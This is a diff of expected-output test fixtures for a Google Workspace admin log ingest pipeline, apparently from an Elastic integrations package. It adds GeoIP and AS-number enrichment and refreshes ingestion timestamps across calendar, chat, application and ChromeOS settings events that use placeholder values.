"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"DELETE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "DELETE_APPLICATION_SETTING", @@ -229,6 +265,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -238,7 +286,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:24.232179800Z", + "ingested": "2021-12-14T14:44:14.845001004Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"REORDER_GROUP_BASED_POLICIES_EVENT\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_PRIORITIES\",\"multiValue\":[\"a\",\"b\"]},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "REORDER_GROUP_BASED_POLICIES_EVENT", @@ -294,6 +342,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -303,7 +363,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:24.232187800Z", + "ingested": "2021-12-14T14:44:14.845001388Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"GPLUS_PREMIUM_FEATURES\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "GPLUS_PREMIUM_FEATURES", @@ -357,6 +417,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -366,7 +438,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:24.232194900Z", + "ingested": "2021-12-14T14:44:14.845001857Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CREATE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "CREATE_MANAGED_CONFIGURATION", @@ -419,6 +491,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -428,7 +512,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:24.232202500Z", + "ingested": "2021-12-14T14:44:14.845002248Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"DELETE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "DELETE_MANAGED_CONFIGURATION", @@ -481,6 +565,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -490,7 +586,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:24.232209900Z", + "ingested": "2021-12-14T14:44:14.845002626Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"UPDATE_MANAGED_CONFIGURATION\",\"parameters\":[{\"name\":\"MANAGED_CONFIGURATION_NAME\",\"value\":\"a\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "UPDATE_MANAGED_CONFIGURATION", @@ -544,6 +640,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -553,7 +661,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:24.232262300Z", + "ingested": "2021-12-14T14:44:14.845003012Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED\",\"parameters\":[{\"name\":\"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTION\",\"value\":\"FLASHLIGHT_EDU_SELECTION_MANUAL\"}]}}", "provider": "admin", "action": "FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log-expected.json index 053ba1dfa15..bfb559e21e7 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-calendar.log-expected.json @@ -34,6 +34,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -43,7 +55,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433465700Z", + "ingested": "2021-12-14T14:44:16.283737660Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "CREATE_BUILDING", @@ -98,6 +110,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -107,7 +131,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433469800Z", + "ingested": "2021-12-14T14:44:16.283740432Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "DELETE_BUILDING", @@ -162,6 +186,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -171,7 +207,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433476300Z", + "ingested": "2021-12-14T14:44:16.283740880Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_BUILDING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "UPDATE_BUILDING", @@ -226,6 +262,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -235,7 +283,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433482200Z", + "ingested": "2021-12-14T14:44:16.283741420Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "CREATE_CALENDAR_RESOURCE", @@ -290,6 +338,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -299,7 +359,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433486400Z", + "ingested": "2021-12-14T14:44:16.283741839Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "DELETE_CALENDAR_RESOURCE", @@ -354,6 +414,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -363,7 +435,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433491100Z", + "ingested": "2021-12-14T14:44:16.283742285Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CREATE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "CREATE_CALENDAR_RESOURCE_FEATURE", @@ -418,6 +490,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -427,7 +511,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433496600Z", + "ingested": "2021-12-14T14:44:16.283742696Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"DELETE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "DELETE_CALENDAR_RESOURCE_FEATURE", @@ -482,6 +566,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -491,7 +587,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433502Z", + "ingested": "2021-12-14T14:44:16.283743086Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_CALENDAR_RESOURCE_FEATURE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "UPDATE_CALENDAR_RESOURCE_FEATURE", @@ -547,6 +643,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -556,7 +664,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433507100Z", + "ingested": "2021-12-14T14:44:16.283743522Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"RENAME_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "RENAME_CALENDAR_RESOURCE", @@ -611,6 +719,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -620,7 +740,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433512700Z", + "ingested": "2021-12-14T14:44:16.283743911Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"UPDATE_CALENDAR_RESOURCE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"FIELD_NAME\",\"value\":\"field\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"RESOURCE_IDENTIFIER\",\"value\":\"1234\"}]}}", "provider": "admin", "action": "UPDATE_CALENDAR_RESOURCE", @@ -675,6 +795,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -684,7 +816,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433517300Z", + "ingested": "2021-12-14T14:44:16.283744290Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CHANGE_CALENDAR_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CALENDAR_SETTING", @@ -741,6 +873,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -750,7 +894,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433520800Z", + "ingested": "2021-12-14T14:44:16.283744825Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"CANCEL_CALENDAR_EVENTS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "CANCEL_CALENDAR_EVENTS", @@ -811,6 +955,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -820,7 +976,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:25.433542300Z", + "ingested": "2021-12-14T14:44:16.283745213Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CALENDAR_SETTINGS\",\"name\":\"RELEASE_CALENDAR_RESOURCES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "RELEASE_CALENDAR_RESOURCES", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log-expected.json index db163f62692..bdff8768cd5 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chat.log-expected.json @@ -34,6 +34,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -43,7 +55,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.141313500Z", + "ingested": "2021-12-14T14:44:18.435060822Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_CREATE_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", "provider": "admin", "action": "MEET_INTEROP_CREATE_GATEWAY", @@ -98,6 +110,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -107,7 +131,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.141321500Z", + "ingested": "2021-12-14T14:44:18.435064773Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_DELETE_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", "provider": "admin", "action": "MEET_INTEROP_DELETE_GATEWAY", @@ -162,6 +186,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -171,7 +207,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.141327Z", + "ingested": "2021-12-14T14:44:18.435065227Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"MEET_INTEROP_MODIFY_GATEWAY\",\"parameters\":[{\"name\":\"GATEWAY_NAME\",\"value\":\"gateway\"}]}}", "provider": "admin", "action": "MEET_INTEROP_MODIFY_GATEWAY", @@ -227,6 +263,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -236,7 +284,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.141332500Z", + "ingested": "2021-12-14T14:44:18.435065588Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"CHAT_SETTINGS\",\"name\":\"CHANGE_CHAT_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_CHAT_SETTING", diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log-expected.json index f644b296556..f0e54bbaf17 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-chromeos.log-expected.json @@ -34,6 +34,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -43,7 +55,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:27.668031200Z", + "ingested": "2021-12-14T14:44:19.076071383Z", "original": 